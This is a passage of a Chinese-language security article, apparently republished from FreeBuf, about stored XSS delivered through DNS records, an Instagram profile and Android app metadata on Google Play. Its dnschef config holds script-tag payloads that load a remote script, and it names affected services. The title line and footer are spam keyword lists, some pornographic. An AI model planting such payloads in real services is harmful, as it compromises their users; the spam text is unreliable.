成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

我們要在任何可能的地方測試XSS漏洞

安全 應用安全 漏洞
在這篇文章中,我準備跟大家討論幾種不同的場景,在這些場景中,不同的服務都會收集各種各樣的數據,但它們又無法正確地去處理這些數據。

在這篇文章中,我準備跟大家討論幾種不同的場景,在這些場景中,不同的服務都會收集各種各樣的數據,但它們又無法正確地去處理這些數據。在某些情況下,數據采用的是安全格式存儲和傳輸的,但是由于數據的解析操作以及進一步處理的過程中存在安全問題,將導致無害的字符串變成攻擊向量。

XSS和DNS

如果你在搜索引擎中搜索“通過DNS實現XSS”(XSS via DNS)的相關話題,你將會看到類似【參考資料一】和【參考資料二】這種介紹如何在TXT記錄中傳遞XSS攻擊向量的文章。但是為什么沒有人考慮過其他類型的記錄呢?比如說CNAME或NS之類的。因為如果你想把域名作為一個攻擊向量的話,你還需要創建自己的NS服務器。

也許使用DNSCHEF會是一個好主意。

 

我使用的子域名是hack.bo0om.ru(任何子域名都可以),并且將我的IP設置成了該域名的NS服務器。接下來修改dnschef.ini并完成dnschef的配置,添加下列記錄:

  1. [MX]  
  2.  
  3. *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js> 
  4.  
  5. [NS]  
  6.  
  7. *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js> 
  8.  
  9. [CNAME] 
  10.  
  11. *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js> 

如果某個在線服務得到了DNS數據之后還將它們打印在了屏幕上,只能說明該服務忘記過濾掉這些數據了。

 

下面是一些存在XSS漏洞的例子:

  1. ·        who.is 
  2.  
  3. ·        robtex.com 
  4.  
  5. ·        dnsqueries.com 
  6.  
  7. ·        etc 

XSS和Instagram

有一次我只是為了好玩,然后將一段XSS Payload添加到了我Instagram的個人狀態中。一開始沒發生什么有趣的事,而且這個XSS Payload也是沒有攻擊性的。

 

但是之后我發現,這個XSS Payload竟然在另外的域名和在線服務中起作用了,從我的Web服務器日志記錄來看,這些域名貌似指向的是社交網絡解析器和一些分析服務。下面給出的是其中部分示例:

  1. ·        findgram.me 
  2.  
  3. ·        imgrab.com 
  4.  
  5. ·        instagy.com 
  6.  
  7. ·        iconosquare.com 
  8.  
  9. ·        tofo.me 
  10.  
  11. ·        photo.sh 
  12.  
  13. ·        gramosphere.com 

不過其中有一部分已經修復了這個漏洞。

XSS和Google Play

最近,@Black2Fan給我發了一條信息,并問我能不能夠在Google Play應用商店上傳存在XSS漏洞的Android App。我當時都不知道竟然還有這種操作!但我感覺可行。于是我自己弄了一個App,然后為這個App生成了一個證書,并將其中的開發者名稱和其他數據用XSS向量進行了替換。

XSS和Google Play

我用一些包含惡意代碼的文件以及文件路徑組成了一個有效的頁面標簽,并從我自己的域名加載相應的腳本文件。

注:Linux系統支持在文件名中使用特殊字符。

雖然我們可以在文件名中注入自己的腳本代碼,但壞消息是這里有30個字符的限制。不幸的是,我手上可以使用的域名都有點長,而且那些只有一個或兩個字符的域名估計都已經被注冊掉了。但是在現代Web中,你可以使用punycode編碼來注冊域名,而且現在還有很多免費的punycode域名沒有被注冊。比如說xn--g3h。所以我注冊了一個.ws域名(請參考下圖,有個符號這里打不出來,包括點號在內一共四個字符)。

XSS和Google Play

這個App目前仍然可以在Google Play應用商店中找到,但是它隨時可能被刪掉。

而且更加有趣的是,當我將這個App上傳到VirusTotal之后,其中的XSS向量竟然觸發了反病毒產品Web端面板中的漏洞。哈哈哈…而且除了VirusTotla之外,還有兩家天朝的安全廠商也存在這種問題,但這里我就不直接提他們的名字了。

總結

 

作為一個Bug Hunter,雖然我這一次的發現沒能拿到漏洞獎金,但希望可以給大家提供一種新的挖洞思路,其實我也只是為了好玩而已:D不喜勿噴

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2018-05-14 15:10:10

Vim編輯器Linux

2020-06-05 08:12:45

Linux發行版操作系統

2020-06-05 10:20:50

Linux發行版內存

2017-02-16 15:47:12

2021-06-22 09:22:05

Hyper-V遠程管理虛擬化

2013-12-17 09:51:52

SVNgit

2021-07-16 08:00:00

開發VSCode編輯器

2020-01-21 21:35:30

代碼開發工具

2017-09-19 15:45:39

2023-12-31 09:06:08

2011-08-31 09:40:25

VMwareWindows

2010-04-30 15:45:09

2020-07-13 23:19:53

物聯網安全技術

2009-12-29 14:25:14

phpXSS漏洞

2013-11-27 17:12:27

2020-05-19 11:54:04

腳本語言Linux命令

2019-03-25 07:27:14

XSS漏洞Ecshop

2021-07-15 17:50:34

Windows 365云服務微軟

2024-04-24 13:59:02

云原生應用

2014-04-29 15:11:24

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 精品一二区 | 国产一区二区三区四区五区加勒比 | 欧美啊v在线观看 | 久久久久网站 | 殴美一级片| 久久精品亚洲精品国产欧美 | 中文字幕一区二区三区在线视频 | 最新超碰 | 天堂在线1 | 亚洲视频一区二区三区四区 | 一区二区三区精品 | 九九久久久久久 | 91欧美 | 日韩免费一区二区 | 国产欧美日韩精品一区 | 欧美视频二区 | 亚洲在线免费观看 | 久久中文字幕视频 | 精品视频久久久 | 91资源在线 | 国产免费一区二区三区网站免费 | 国产精品福利网 | 国产成人在线视频免费观看 | 国户精品久久久久久久久久久不卡 | 中文字幕爱爱视频 | 免费能直接在线观看黄的视频 | 日韩在线视频观看 | 久久久www成人免费无遮挡大片 | 色婷婷狠狠 | 99久久国产精 | 日韩在线精品视频 | 91精品国产91久久久久久吃药 | 国产欧美一区二区精品忘忧草 | 中文字幕一二三区 | 日日骚av | 国产精品视频不卡 | 黄视频免费在线 | 免费99视频 | 日韩午夜 | 久草新在线| 一区二区三区播放 |